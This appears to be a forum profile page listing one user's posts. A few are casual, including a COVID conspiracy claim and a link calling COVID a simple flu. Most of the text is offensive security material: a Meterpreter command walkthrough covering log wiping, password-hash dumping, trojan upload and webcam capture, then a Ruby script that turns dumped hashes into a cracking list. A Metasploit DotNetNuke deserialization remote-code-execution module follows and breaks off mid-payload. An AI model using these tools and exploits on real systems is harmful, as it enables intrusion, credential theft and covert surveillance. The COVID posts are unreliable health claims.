Kev

Active Members
  • Posts: 1026
  • Days Won: 55

Everything posted by Kev

  1. Kev

    COVID-19

    Could be, but I think it is something else, not in the blood, sneezing etc. I have a 10 in biology, a 10 in chemistry, chemical calculations, I haven't done them in a long time. This morning I noticed insects that I had never seen in my life in a catalogue. What do I think? The Koreans (since they keep making rockets on an assembly line) upset someone from space, or they brought someone superior in to run tests and they came looking for him. That would roughly be my opinion; as for the rest, sneezing, coughing and nonsense like that, I'm fed up with it.
  2. Kev

    COVID-19

    And when I told you, you went "Batman, Batman": https://www.secretulsanatatii.net/este-o-simpla-gripa-nu-o-boala-mortala-va-rog-reduceti-tonurile-declaratia-unui-medic-italian/
  3. From rm --help:

        -r, -R, --recursive   remove directories and their contents recursively
        -f, --force           ignore nonexistent files and arguments, never prompt
  4. Wallpaper
  5. USING METERPRETER COMMANDS

Since Meterpreter provides a whole new environment, we will cover some of the basic Meterpreter commands to get you started and help familiarize you with this most powerful tool. Throughout this course, almost every available Meterpreter command is covered. For those that aren't covered, experimentation is the key to successful learning.

HELP

The help command, as may be expected, displays the Meterpreter help menu.

    meterpreter > help

    Core Commands
    =============

        Command       Description
        -------       -----------
        ?             Help menu
        background    Backgrounds the current session
        channel       Displays information about active channels
    ...snip...

BACKGROUND

The background command will send the current Meterpreter session to the background and return you to the 'msf' prompt. To get back to your Meterpreter session, just interact with it again.

    meterpreter > background
    msf exploit(ms08_067_netapi) > sessions -i 1
    [*] Starting interaction with 1...
    meterpreter >

CAT

The cat command is identical to the command found on *nix systems. It displays the content of a file when it's given as an argument.

    meterpreter > cat
    Usage: cat file

Example usage:

    meterpreter > cat edit.txt
    What you talkin' about Willis
    meterpreter >

CD AND PWD

The cd and pwd commands are used to change and display the current working directory on the target host. The change directory command "cd" works the same way as it does under DOS and *nix systems. By default, the current working folder is where the connection to your listener was initiated.

ARGUMENTS:
    cd: Path of the folder to change to
    pwd: None required

Example usage:

    meterpreter > pwd
    c:\
    meterpreter > cd c:\windows
    meterpreter > pwd
    c:\windows
    meterpreter >

CLEAREV

The clearev command will clear the Application, System, and Security logs on a Windows system. There are no options or arguments. Note that clearing a log is itself an audited event: on Windows XP/2003 a cleared Security log produces event 517 ("The audit log was cleared"), and on Vista and later it produces event 1102 in the Security log and 104 in the System log, so a defender watching for exactly these IDs will see the cleanup even though the earlier entries are gone.

Example usage:

    meterpreter > clearev
    [*] Wiping 97 records from Application...
    [*] Wiping 415 records from System...
    [*] Wiping 0 records from Security...
    meterpreter >

DOWNLOAD

The download command downloads a file from the remote machine. Note the use of the double-slashes when giving the Windows path.

    meterpreter > download c:\\boot.ini
    [*] downloading: c:\boot.ini -> c:\boot.ini
    [*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini
    meterpreter >

EDIT

The edit command opens a file located on the target host. It uses vim, so all the editor's commands are available.

Example usage:

    meterpreter > ls

    Listing: C:\Documents and Settings\Administrator\Desktop
    ========================================================

    Mode              Size  Type  Last modified              Name
    ----              ----  ----  -------------              ----
    ...snip...
    100666/rw-rw-rw-  0     fil   2012-03-01 13:47:10 -0500  edit.txt

    meterpreter > edit edit.txt

Please refer to the vim editor documentation for more advanced use: http://www.vim.org/

EXECUTE

The execute command runs a command on the target.

    meterpreter > execute -f cmd.exe -i -H
    Process 38320 created.
    Channel 1 created.
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\WINDOWS\system32>

GETUID

Running getuid will display the user that the Meterpreter server is running as on the host.

    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
    meterpreter >

HASHDUMP

The hashdump post module will dump the contents of the SAM database. Each line is user:RID:LM hash:NT hash:::. An LM value of aad3b435b51404eeaad3b435b51404ee means no LM hash is stored (LM hashing disabled or an empty password); when only the second half is aad3b435b51404ee, as for dook and victim below, the password is 7 characters or fewer and the LM half that is present cracks quickly; an NT value of 31d6cfe0d16ae931b73c59d7e0c089c0 is the hash of an empty password (Guest below).

    meterpreter > run post/windows/gather/hashdump

    [*] Obtaining the boot key...
    [*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
    [*] Obtaining the user list and keys...
    [*] Decrypting user keys...
    [*] Dumping password hashes...

    Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3:::
    dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e:::
    SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9:::
    victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d:::
    meterpreter >

IDLETIME

Running idletime will display the number of seconds that the user at the remote machine has been idle.

    meterpreter > idletime
    User has been idle for: 5 hours 26 mins 35 secs
    meterpreter >

IPCONFIG

The ipconfig command displays the network interfaces and addresses on the remote machine.

    meterpreter > ipconfig

    MS TCP Loopback interface
    Hardware MAC: 00:00:00:00:00:00
    IP Address  : 127.0.0.1
    Netmask     : 255.0.0.0

    AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
    Hardware MAC: 00:0c:29:10:f5:15
    IP Address  : 192.168.1.104
    Netmask     : 255.255.0.0

    meterpreter >

LPWD AND LCD

The lpwd and lcd commands are used to display and change the local working directory respectively. When receiving a Meterpreter shell, the local working directory is the location where one started the Metasploit console. Changing the working directory will give your Meterpreter session access to files located in this folder.

ARGUMENTS:
    lpwd: None required
    lcd: Destination folder

Example usage:

    meterpreter > lpwd
    /root
    meterpreter > lcd MSFU
    meterpreter > lpwd
    /root/MSFU
    meterpreter > lcd /var/www
    meterpreter > lpwd
    /var/www
    meterpreter >

LS

As in Linux, the ls command will list the files in the current remote directory.

    meterpreter > ls

    Listing: C:\Documents and Settings\victim
    =========================================

    Mode              Size  Type  Last modified                   Name
    ----              ----  ----  -------------                   ----
    40777/rwxrwxrwx   0     dir   Sat Oct 17 07:40:45 -0600 2009  .
    40777/rwxrwxrwx   0     dir   Fri Jun 19 13:30:00 -0600 2009  ..
    100666/rw-rw-rw-  218   fil   Sat Oct 03 14:45:54 -0600 2009  .recently-used.xbel
    40555/r-xr-xr-x   0     dir   Wed Nov 04 19:44:05 -0700 2009  Application Data
    ...snip...

MIGRATE

Using the migrate post module, you can migrate to another process on the victim.

    meterpreter > run post/windows/manage/migrate

    [*] Running module against V-MAC-XP
    [*] Current server process: svchost.exe (1076)
    [*] Migrating to explorer.exe...
    [*] Migrating into process ID 816
    [*] New server process: Explorer.EXE (816)
    meterpreter >

PS

The ps command displays a list of running processes on the target.

    meterpreter > ps

    Process list
    ============

       PID   Name            Path
       ---   ----            ----
       132   VMwareUser.exe  C:\Program Files\VMware\VMware Tools\VMwareUser.exe
       152   VMwareTray.exe  C:\Program Files\VMware\VMware Tools\VMwareTray.exe
       288   snmp.exe        C:\WINDOWS\System32\snmp.exe
    ...snip...

RESOURCE

The resource command will execute Meterpreter instructions located inside a text file. Containing one entry per line, resource will execute each line in sequence. This can help automate repetitive actions performed by a user. By default, the commands will run in the current working directory (on the target machine) and the resource file is read from the local working directory (the attacking machine).

    meterpreter > resource
    Usage: resource path1 [path2 ...]
    Run the commands stored in the supplied files.
    meterpreter >

ARGUMENTS:
    path1: The location of the file containing the commands to run.
    path2 ...: Further resource files, executed in order after the first.

Example usage

Our file used by resource:

    root@kali:~# cat resource.txt
    ls
    background
    root@kali:~#

Running the resource command:

    meterpreter > resource resource.txt
    [*] Reading /root/resource.txt
    [*] Running ls

    Listing: C:\Documents and Settings\Administrator\Desktop
    ========================================================

    Mode              Size    Type  Last modified              Name
    ----              ----    ----  -------------              ----
    40777/rwxrwxrwx   0       dir   2012-02-29 16:41:29 -0500  .
    40777/rwxrwxrwx   0       dir   2012-02-02 12:24:40 -0500  ..
    100666/rw-rw-rw-  606     fil   2012-02-15 17:37:48 -0500  IDA Pro Free.lnk
    100777/rwxrwxrwx  681984  fil   2012-02-02 15:09:18 -0500  Sc303.exe
    100666/rw-rw-rw-  608     fil   2012-02-28 19:18:34 -0500  Shortcut to Ability Server.lnk
    100666/rw-rw-rw-  522     fil   2012-02-02 12:33:38 -0500  XAMPP Control Panel.lnk

    [*] Running background
    [*] Backgrounding session 1...
    msf exploit(handler) >

SEARCH

The search command provides a way of locating specific files on the target host. The command is capable of searching through the whole system or specific folders. Wildcards can also be used when creating the file pattern to search for.

    meterpreter > search
    [-] You must specify a valid file glob to search for, e.g. >search -f *.doc

ARGUMENTS:
    File pattern: May contain wildcards
    Search location: Optional, if none is given the whole system will be searched.

Example usage:

    meterpreter > search -f autoexec.bat
    Found 1 result...
        c:\AUTOEXEC.BAT
    meterpreter > search -f sea*.bat c:\\xamp\\
    Found 1 result...
        c:\\xampp\perl\bin\search.bat (57035 bytes)
    meterpreter >

SHELL

The shell command will present you with a standard shell on the target system.

    meterpreter > shell
    Process 39640 created.
    Channel 2 created.
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\WINDOWS\system32>

UPLOAD

As with the download command, you need to use double-slashes with the upload command.

    meterpreter > upload evil_trojan.exe c:\\windows\\system32
    [*] uploading  : evil_trojan.exe -> c:\windows\system32
    [*] uploaded   : evil_trojan.exe -> c:\windows\system32\evil_trojan.exe
    meterpreter >

WEBCAM_LIST

The webcam_list command, when run from the Meterpreter shell, will display the currently available web cams on the target host.

Example usage:

    meterpreter > webcam_list
    1: Creative WebCam NX Pro
    2: Creative WebCam NX Pro (VFW)
    meterpreter >

WEBCAM_SNAP

The webcam_snap command grabs a picture from a connected web cam on the target system and saves it to disk as a JPEG image. By default, the save location is the local current working directory with a randomized filename.

    meterpreter > webcam_snap -h
    Usage: webcam_snap [options]
    Grab a frame from the specified webcam.

    OPTIONS:

        -h        Help Banner
        -i <opt>  The index of the webcam to use (Default: 1)
        -p <opt>  The JPEG image path (Default: 'gnFjTnzi.jpeg')
        -q <opt>  The JPEG image quality (Default: '50')
        -v <opt>  Automatically view the JPEG image (Default: 'true')

    meterpreter >

OPTIONS:
    -h: Displays the help information for the command
    -i opt: If more than one web cam is connected, use this option to select the device to capture the image from
    -p opt: Change the path and filename of the image to be saved
    -q opt: The image quality, 50 being the default/medium setting, 100 being best quality
    -v opt: By default the value is true, which opens the image after capture.

Example usage:

    meterpreter > webcam_snap -i 1 -v false
    [*] Starting...
    [+] Got frame
    [*] Stopped
    Webcam shot saved to: /root/Offsec/YxdhwpeQ.jpeg
    meterpreter >

Source: Metasploit Unleashed (Offensive Security)
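The first thing an operator does with a fresh hashdump is triage it: which accounts have no password, which still have a crackable LM hash, which RIDs are the built-in accounts. The following Ruby script is an added example written for this post; it is not part of Metasploit Unleashed or of the hashdump module. The Administrator and Guest lines are the ones shown above, the "svc_backup" entry and the stray status line are constructed to exercise the parser, and the hashcat-style output format is the "user:hash" list hashcat accepts for NTLM (mode 1000) with --username.

```ruby
# Triage of Meterpreter hashdump output (pwdump format: user:RID:LM:NT:::).
# Added example, not from Metasploit Unleashed. The Administrator and Guest
# lines are the ones printed by hashdump above; svc_backup and the "[*]" line
# are constructed so the parser has a clean account and junk to skip.
SAMPLE_HASHDUMP = <<~DUMP
  [*] Dumping password hashes...
  Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  svc_backup:1005:aad3b435b51404eeaad3b435b51404ee:5e8c3f1d9a2b4c7e0f6a1b3c5d7e9f02:::
DUMP

# Well-known constants: the LM "hash" stored when LM hashing is disabled or the
# password is empty, the LM half for an empty 7-byte half, and the NT hash of "".
EMPTY_LM      = "aad3b435b51404eeaad3b435b51404ee".freeze
EMPTY_LM_HALF = "aad3b435b51404ee".freeze
EMPTY_NT      = "31d6cfe0d16ae931b73c59d7e0c089c0".freeze

HASH_LINE = /\A(?<user>[^:]+):(?<rid>\d+):(?<lm>[0-9a-f]{32}):(?<nt>[0-9a-f]{32}):::\z/i

# Parse pwdump-style lines into hashes; status output and blank lines are
# skipped instead of raising, because hashdump interleaves both with the data.
def parse_hashdump(text)
  text.each_line.map do |line|
    m = HASH_LINE.match(line.strip)
    next unless m
    { user: m[:user], rid: m[:rid].to_i, lm: m[:lm].downcase, nt: m[:nt].downcase }
  end.compact
end

# Classify each account with the checks run first on a new dump.
# Returns { "user" => [flags...] }.
def triage(text)
  parse_hashdump(text).each_with_object({}) do |e, out|
    flags = []
    flags << :empty_password if e[:nt] == EMPTY_NT
    if e[:lm] != EMPTY_LM
      flags << :lm_hash_stored                       # LM enabled: <= 14 chars, fast to crack
      flags << :password_7_or_less if e[:lm].end_with?(EMPTY_LM_HALF)
    end
    flags << :builtin_admin if e[:rid] == 500        # RID 500 is always the built-in Administrator
    flags << :guest         if e[:rid] == 501
    out[e[:user]] = flags
  end
end

# "user:NT" lines for hashcat -m 1000 --username; empty passwords need no cracking.
def ntlm_crack_list(text)
  parse_hashdump(text).reject { |e| e[:nt] == EMPTY_NT }.map { |e| "#{e[:user]}:#{e[:nt]}" }
end

if __FILE__ == $0
  triage(SAMPLE_HASHDUMP).each { |user, flags| puts "#{user}: #{flags.inspect}" }
  puts ntlm_crack_list(SAMPLE_HASHDUMP)
end
```

Run it against a saved hashdump with `triage(File.read("hashes.txt"))`; the `:password_7_or_less` flag is the one worth acting on first, since the non-empty LM half cracks in minutes, and `:empty_password` accounts (here Guest) need no cracking at all.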
  6. This Metasploit module exploits a deserialization vulnerability in DotNetNuke (DNN) versions 5.0.0 through 9.3.0-RC. Vulnerable versions store profile information for users in the DNNPersonalization cookie as XML. The expected structure includes a "type" attribute to instruct the server which type of object to create on deserialization. The cookie is processed by the application whenever it attempts to load the current user's profile data. This occurs when DNN is configured to handle 404 errors with its built-in error page (default configuration). An attacker can leverage this vulnerability to execute arbitrary code on the system.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/exploit/powershell'
require 'openssl'
require 'set'

class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::HttpServer

  Rank = ExcellentRanking

  # =================================
  # Overridden setup method to allow
  # for delayed handler start
  # =================================
  def setup
    # Reset the session counts to zero.
    reset_session_counts

    return if !payload_instance
    return if !handler_enabled?

    # Configure the payload handler
    payload_instance.exploit_config = {
      'active_timeout' => active_timeout
    }

    # payload handler is normally set up and started here
    # but has been removed so we can start the handler when needed.
  end

  def initialize(info = {})
    super(update_info(
      info,
      'Name' => "DotNetNuke Cookie Deserialization Remote Code Execution",
      'Description' => %q(
        This module exploits a deserialization vulnerability in DotNetNuke (DNN) versions 5.0.0 to 9.3.0-RC.
        Vulnerable versions store profile information for users in the DNNPersonalization cookie as XML.
        The expected structure includes a "type" attribute to instruct the server which type of object to
        create on deserialization. The cookie is processed by the application whenever it attempts to load
        the current user's profile data. This occurs when DNN is configured to handle 404 errors with its
        built-in error page (default configuration). An attacker can leverage this vulnerability to execute
        arbitrary code on the system.
      ),
      'License' => MSF_LICENSE,
      'Author' => [
        'Jon Park',
        'Jon Seigel'
      ],
      'References' => [
        [ 'CVE', '2017-9822' ],
        [ 'CVE', '2018-15811'],
        [ 'CVE', '2018-15812'],
        [ 'CVE', '2018-18325'], # due to failure to patch CVE-2018-15811
        [ 'CVE', '2018-18326'], # due to failure to patch CVE-2018-15812
        [ 'URL', 'https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf'],
        [ 'URL', 'https://googleprojectzero.blogspot.com/2017/04/exploiting-net-managed-dcom.html'],
        [ 'URL', 'https://github.com/pwntester/ysoserial.net']
      ],
      'Platform' => 'win',
      'Targets' => [
        [ 'Automatic', { 'auto' => true } ],
        [ 'v5.0 - v9.0.0', { 'ReqEncrypt' => false, 'ReqSession' => false } ],
        [ 'v9.0.1 - v9.1.1', { 'ReqEncrypt' => false, 'ReqSession' => false } ],
        [ 'v9.2.0 - v9.2.1', { 'ReqEncrypt' => true, 'ReqSession' => true } ],
        [ 'v9.2.2 - v9.3.0-RC', { 'ReqEncrypt' => true, 'ReqSession' => true } ]
      ],
      'Stance' => Msf::Exploit::Stance::Aggressive,
      'Payload' => { },
      'Privileged' => false,
      'DisclosureDate' => "Jul 20 2017",
      'DefaultOptions' => { 'WfsDelay' => 5 },
      'DefaultTarget' => 0
    ))

    deregister_options('SRVHOST')

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path that will result in the DNN 404 response', '/__']),
        OptBool.new('DryRun', [false, 'Performs target version check, finds encryption KEY and IV values if required, and outputs a cookie payload', false]),
        OptString.new('VERIFICATION_PLAIN', [false, %q(The known (full or partial) plaintext of the encrypted verification code.
          Typically in the format of {portalID}-{userID} where portalID is an integer and userID is either an integer or GUID (v9.2.2+)), '']),
        OptBool.new('ENCRYPTED', [true, %q(Whether or not to encrypt the final payload cookie; (VERIFICATION_CODE and VERIFICATION_PLAIN) or (KEY and IV) are required if set to true.), false]),
        OptString.new('KEY', [false, 'The key to use for encryption.', '']),
        OptString.new('IV', [false, 'The initialization vector to use for encryption.', '']),
        OptString.new('SESSION_TOKEN', [false, %q(The .DOTNETNUKE session cookie to use when submitting the payload to the target server. DNN versions 9.2.0+ require the attack to be submitted from an authenticated context.), '']),
        OptString.new('VERIFICATION_CODE', [false, %q(The encrypted verification code received in a registration email. Can also be the path to a file containing a list of verification codes.), ''])
      ]
    )

    initialize_instance_variables
  end

  def initialize_instance_variables
    # ==================
    # COMMON VARIABLES
    # ==================
    @target_idx = 0

    # Flag for whether or not to perform exploitation
    @dry_run = false

    # Flag for whether or not the target requires encryption
    @encrypted = false

    # Flag for whether or not to attempt to decrypt the provided verification token(s)
    @try_decrypt = false

    # ==================
    # PAYLOAD VARIABLES
    # ==================
    # ObjectStateFormatter serialized header
    @osf_header = [255, 1, 50]

    # ObjectStateFormatter serialized data before the command payload
    @osf_wrapper_start = [
      0, 1, 0, 0, 0, 255, 255, 255, 255, 1, 0, 0, 0, 0, 0, 0, 0, 12, 2, 0, 0, 0, 73, 83, 121, 115, 116, 101, 109, 44, 32, 86, 101, 114, 115, 105, 111, 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61, 110, 101, 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101, 121, 84, 111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56, 57, 5, 1, 0, 0, 0, 132, 1, 83, 121, 115, 116, 101, 109, 46, 67, 111, 108, 108, 101, 99, 116,
105, 111, 110, 115, 46, 71, 101, 110, 101, 114, 105, 99, 46, 83, 111, 114, 116, 101, 100, 83, 101, 116, 96, 49, 91, 91, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 109, 115, 99, 111, 114, 108, 105, 98, 44, 32, 86, 101, 114, 115, 105, 111, 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61, 110, 101, 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101, 121, 84, 111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56, 57, 93, 93, 4, 0, 0, 0, 5, 67, 111, 117, 110, 116, 8, 67, 111, 109, 112, 97, 114, 101, 114, 7, 86, 101, 114, 115, 105, 111, 110, 5, 73, 116, 101, 109, 115, 0, 3, 0, 6, 8, 141, 1, 83, 121, 115, 116, 101, 109, 46, 67, 111, 108, 108, 101, 99, 116, 105, 111, 110, 115, 46, 71, 101, 110, 101, 114, 105, 99, 46, 67, 111, 109, 112, 97, 114, 105, 115, 111, 110, 67, 111, 109, 112, 97, 114, 101, 114, 96, 49, 91, 91, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 109, 115, 99, 111, 114, 108, 105, 98, 44, 32, 86, 101, 114, 115, 105, 111, 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61, 110, 101, 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101, 121, 84, 111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56, 57, 93, 93, 8, 2, 0, 0, 0, 2, 0, 0, 0, 9, 3, 0, 0, 0, 2, 0, 0, 0, 9, 4, 0, 0, 0, 4, 3, 0, 0, 0, 141, 1, 83, 121, 115, 116, 101, 109, 46, 67, 111, 108, 108, 101, 99, 116, 105, 111, 110, 115, 46, 71, 101, 110, 101, 114, 105, 99, 46, 67, 111, 109, 112, 97, 114, 105, 115, 111, 110, 67, 111, 109, 112, 97, 114, 101, 114, 96, 49, 91, 91, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 109, 115, 99, 111, 114, 108, 105, 98, 44, 32, 86, 101, 114, 115, 105, 111, 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61, 110, 101, 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101, 121, 84, 111, 107, 101, 110, 61, 
      98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56, 57, 93, 93, 1, 0, 0, 0, 11, 95, 99, 111, 109, 112, 97, 114, 105, 115, 111, 110, 3, 34, 83, 121, 115, 116, 101, 109, 46, 68, 101, 108, 101, 103, 97, 116, 101, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 9, 5, 0, 0, 0, 17, 4, 0, 0, 0, 2, 0, 0, 0, 6, 6, 0, 0, 0
    ]

    # ObjectStateFormatter serialized data to place after the command payload.
    @osf_wrapper_end = [
      6, 7, 0, 0, 0, 3, 99, 109, 100, 4, 5, 0, 0, 0, 34, 83, 121, 115, 116, 101, 109, 46, 68, 101, 108, 101, 103, 97, 116, 101, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 3, 0, 0, 0, 8, 68, 101, 108, 101, 103, 97, 116, 101, 7, 109, 101, 116, 104, 111, 100, 48, 7, 109, 101, 116, 104, 111, 100, 49, 3, 3, 3, 48, 83, 121, 115, 116, 101, 109, 46, 68, 101, 108, 101, 103, 97, 116, 101, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 43, 68, 101, 108, 101, 103, 97, 116, 101, 69, 110, 116, 114, 121, 47, 83, 121, 115, 116, 101, 109, 46, 82, 101, 102, 108, 101, 99, 116, 105, 111, 110, 46, 77, 101, 109, 98, 101, 114, 73, 110, 102, 111, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 47, 83, 121, 115, 116, 101, 109, 46, 82, 101, 102, 108, 101, 99, 116, 105, 111, 110, 46, 77, 101, 109, 98, 101, 114, 73, 110, 102, 111, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 9, 8, 0, 0, 0, 9, 9, 0, 0, 0, 9, 10, 0, 0, 0, 4, 8, 0, 0, 0, 48, 83, 121, 115, 116, 101, 109, 46, 68, 101, 108, 101, 103, 97, 116, 101, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 43, 68, 101, 108, 101, 103, 97, 116, 101, 69, 110, 116, 114, 121, 7, 0, 0, 0, 4, 116, 121, 112, 101, 8, 97, 115, 115, 101, 109, 98, 108, 121, 6, 116, 97, 114, 103, 101, 116, 18, 116, 97, 114, 103, 101, 116, 84, 121, 112, 101, 65, 115, 115, 101, 109, 98, 108, 121, 14, 116,
97, 114, 103, 101, 116, 84, 121, 112, 101, 78, 97, 109, 101, 10, 109, 101, 116, 104, 111, 100, 78, 97, 109, 101, 13, 100, 101, 108, 101, 103, 97, 116, 101, 69, 110, 116, 114, 121, 1, 1, 2, 1, 1, 1, 3, 48, 83, 121, 115, 116, 101, 109, 46, 68, 101, 108, 101, 103, 97, 116, 101, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 43, 68, 101, 108, 101, 103, 97, 116, 101, 69, 110, 116, 114, 121, 6, 11, 0, 0, 0, 176, 2, 83, 121, 115, 116, 101, 109, 46, 70, 117, 110, 99, 96, 51, 91, 91, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 109, 115, 99, 111, 114, 108, 105, 98, 44, 32, 86, 101, 114, 115, 105, 111, 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61, 110, 101, 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101, 121, 84, 111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56, 57, 93, 44, 91, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 109, 115, 99, 111, 114, 108, 105, 98, 44, 32, 86, 101, 114, 115, 105, 111, 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61, 110, 101, 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101, 121, 84, 111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56, 57, 93, 44, 91, 83, 121, 115, 116, 101, 109, 46, 68, 105, 97, 103, 110, 111, 115, 116, 105, 99, 115, 46, 80, 114, 111, 99, 101, 115, 115, 44, 32, 83, 121, 115, 116, 101, 109, 44, 32, 86, 101, 114, 115, 105, 111, 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61, 110, 101, 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101, 121, 84, 111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56, 57, 93, 93, 6, 12, 0, 0, 0, 75, 109, 115, 99, 111, 114, 108, 105, 98, 44, 32, 86, 101, 114, 115, 105, 111, 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61, 
110, 101, 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101, 121, 84, 111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56, 57, 10, 6, 13, 0, 0, 0, 73, 83, 121, 115, 116, 101, 109, 44, 32, 86, 101, 114, 115, 105, 111, 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61, 110, 101, 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101, 121, 84, 111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56, 57, 6, 14, 0, 0, 0, 26, 83, 121, 115, 116, 101, 109, 46, 68, 105, 97, 103, 110, 111, 115, 116, 105, 99, 115, 46, 80, 114, 111, 99, 101, 115, 115, 6, 15, 0, 0, 0, 5, 83, 116, 97, 114, 116, 9, 16, 0, 0, 0, 4, 9, 0, 0, 0, 47, 83, 121, 115, 116, 101, 109, 46, 82, 101, 102, 108, 101, 99, 116, 105, 111, 110, 46, 77, 101, 109, 98, 101, 114, 73, 110, 102, 111, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 7, 0, 0, 0, 4, 78, 97, 109, 101, 12, 65, 115, 115, 101, 109, 98, 108, 121, 78, 97, 109, 101, 9, 67, 108, 97, 115, 115, 78, 97, 109, 101, 9, 83, 105, 103, 110, 97, 116, 117, 114, 101, 10, 83, 105, 103, 110, 97, 116, 117, 114, 101, 50, 10, 77, 101, 109, 98, 101, 114, 84, 121, 112, 101, 16, 71, 101, 110, 101, 114, 105, 99, 65, 114, 103, 117, 109, 101, 110, 116, 115, 1, 1, 1, 1, 1, 0, 3, 8, 13, 83, 121, 115, 116, 101, 109, 46, 84, 121, 112, 101, 91, 93, 9, 15, 0, 0, 0, 9, 13, 0, 0, 0, 9, 14, 0, 0, 0, 6, 20, 0, 0, 0, 62, 83, 121, 115, 116, 101, 109, 46, 68, 105, 97, 103, 110, 111, 115, 116, 105, 99, 115, 46, 80, 114, 111, 99, 101, 115, 115, 32, 83, 116, 97, 114, 116, 40, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 41, 6, 21, 0, 0, 0, 62, 83, 121, 115, 116, 101, 109, 46, 68, 105, 97, 103, 110, 111, 115, 116, 105, 99, 115, 46, 80, 114, 111, 99, 101, 115, 115, 32, 83, 116, 97, 114, 116, 40, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 
